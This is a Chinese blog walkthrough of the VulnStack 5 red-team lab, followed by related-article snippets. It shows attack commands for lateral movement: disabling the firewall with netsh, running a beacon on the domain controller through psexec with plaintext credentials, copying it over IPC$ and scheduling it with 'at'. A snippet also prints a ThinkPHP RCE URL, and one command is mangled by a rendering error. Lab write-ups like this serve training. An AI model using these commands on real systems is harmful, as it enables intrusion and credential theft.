ATT&CK 红日5靶机渗透攻略

最新推荐文章于 2024-06-21 02:25:46 发布
最新推荐文章于 2024-06-21 02:25:46 发布
阅读量2k 收藏 5
点赞数
文章标签: 安全 web安全 渗透测试 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/122718848
版权

环境搭建

下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/
本次只有两台靶机 ,Win7双网卡模拟内外网

虚拟机密码

win7
sun\heart 123.com
sun\Administrator dc123.com 改为 !qazwin7

nat:192.168.8.129 (改为dhcp获取)
仅主机:192.168.138.136
到c盘phpstudy中启动phpstudy
在这里插入图片描述

2008
sun\admin 2020.com 改为!qaz2008
仅主机模式:192.168.138.138

信息收集

namp扫描

nmap -sC -sV 192.168.8.129

在这里插入图片描述

发现http80,mysql3306

网站信息收集

在这里插入图片描述

发现thinkphp v5字样

漏洞利用

thinkphp漏洞

既然是thinkphp 直接跑跑工具先
在这里插入图片描述

果然存在好几个漏洞

getshell

直接上穿一句话木马
在这里插入图片描述

解析成功
在这里插入图片描述

蚁剑链接成功
在这里插入图片描述

cs上线

启动cs,生成木马
在这里插入图片描述

上传到目标靶机
在这里插入图片描述

执行木马
在这里插入图片描述

win7上线成功
在这里插入图片描述

内网横向

内网信息收集

使用cs插件ladon
发现内网网段192.168.138.0
在这里插入图片描述

发现存在sun.com域,并且2008dc IP为192.168.138.138

在这里插入图片描述

在这里插入图片描述

mimikatiz抓密码

使用mimikatiz抓取内存密码
在这里插入图片描述

得到账密
administrator !qazwin7
在这里插入图片描述

由于dc是内网环境不出网,因此无法直接连接到cs。
可以使用win7做会话中转,dc连到win7,win7在转发到cs,但是win7开了防火墙,需要关闭防火墙后2008才能连接win7

win7提权并关闭防火墙

win7提权到system
在这里插入图片描述

提权成功
在这里插入图片描述

关闭win7防火墙

shell netsh firewall set opmode disable
在这里插入图片描述

在这里插入图片描述

dc上线

点击win7中转-监听
在这里插入图片描述

在这里插入图片描述

端口开启
在这里插入图片描述

生成木马
在这里插入图片描述

上传木马和psexec
在这里插入图片描述

使用命令执行木马
提示我拒绝访问
shell c:\psexec64.exe -accepteula \192.168.138.138 -u sun\administrator -p !qazwin7 -d -c c:\2008cs.exe
在这里插入图片描述

换个思路
使用IPCKaTeX parse error: Undefined control sequence: \ipc at position 37: …192.168.138.138\̲i̲p̲c̲ “!qazwin7” /user:administrator
在这里插入图片描述

shell copy c:\2008cs.exe \192.168.138.138\c$
在这里插入图片描述

查看时间,通过计划任务执行木马
shell net time \192.168.138.138
在这里插入图片描述

shell at \192.168.138.138 16:22:00 c:\2008cs.exe
在这里插入图片描述

dc上线成功并提权
在这里插入图片描述

在这里插入图片描述

Forest深林
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
红日靶场5wp
weixin_44339234的博客
11-17 870
红日靶场五wp
红日靶场5
m0_58595840的博客
01-10 495
红日5内网渗透
红日靶场-ATT&CK实战系列-红队评估(一)
最新发布
m0_66638011的博客
06-21 868
红日靶机是一系列专门为渗透测试网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场的网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
红日靶场(五)
qq_58091216的博客
05-05 2441
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日内网渗透靶场5(ATK&CK红队评估实战靶场五)
qq_45780190的博客
04-24 4637
环境搭建: 第一次登录会提示需要更改账号密码。 win7账号密码: sun\heart 123.com sun\Administrator dc123.com ————————————————————————————————————————————————————————————— 2008账号密码 sun\admin 2020.com 外网采用NAT模式,内网采用仅主机模式。 添加一个主机模式用于内网,设置网段为192.168.138.0. NAT用于外网,设置网段为192.168.235.0
ATT&CK实战:红日靶场五
学生
06-19 525
已完成 0/9 [-] mysql 192.168.138.130:3306 root 123456 Error 1130: Host 'win7.sun.com' is not allowed to connect to this MySQL server。存在域 sun.com 域控 192.168.138.120 Windows Server 2008 HPC Edition 7600。上传frp 搭建socks隧道。开启win7远程桌面 并连接。获取域内所有用户的hash。连接win7远程桌面。
红日靶场第五关
红队是青春
12-02 6308
红日靶场第五关 一、环境配置 靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com # win7 web需要打开C盘里的phpstudy,最好关一下防火墙 2008 sun\admin 2020.com Win7双网卡模拟内外网 VMnet2网卡:192.168.25.0/24 外网 VMn
ATT&CK手册(修改版)
09-16
5. **案例分析**:为了加深理解,手册可能会包含真实世界的攻击案例,展示攻击者如何运用ATT&CK框架中的战术和技术。 6. **防御策略**:除了描述攻击,手册还会提供防御建议,帮助组织识别和阻止这些攻击行为,包括...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御...movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
ATT&CK框架介绍及战技术对照表
05-18
**ATT&CK框架详解** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由MITRE公司开发的一个公开的知识库,旨在提供一个统一的视角来理解和防御网络攻击。该框架详细描述了攻击者在不同阶段可能...
ATT&CK手册.pdf
09-20
ATT&CK手册.pdf
红日靶机vulnstack05【半总结】
qq_45300786的博客
10-07 298
网络模式 win7 DC2008
ATT&CK实战 VulnStack靶机
Re_ly0n的博客
04-05 4682
外网打点 访问目标IP发现时ThinkPHP框架,经过报错测试发现版本号为v5.0.22,是存在漏洞的版本。百度寻找相关的漏洞去利用。 Payload http://192.168.111.31/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 成功RCE 找能够getshell的漏洞利用点。 Payl
vulnstack(五)-红日靶场复现
BuNahua的博客
09-04 3211
说明:关于该复现中的问题欢迎vx交流:Bestboysendit 目录: 一、靶场信息: 二、外网渗透: 方式一: 方式二: 三、内网进攻: 四、痕迹清理: 五、参考链接: 一、靶场信息: http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。 描述 虚拟机密码
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1623
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
记一次内网渗透ATT&CK第五个攻防靶场)
a168xzy的博客
12-10 1696
记一次内网渗透ATT&CK第五个攻防靶场) 靶场下载地址:download 渗透测试 拿到题目打开是一个thinkphp框架 测试thinkphp版本 找到此版本漏洞的poc 可以命令执行 http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 查看当前路径 http://192.1
红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2023
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值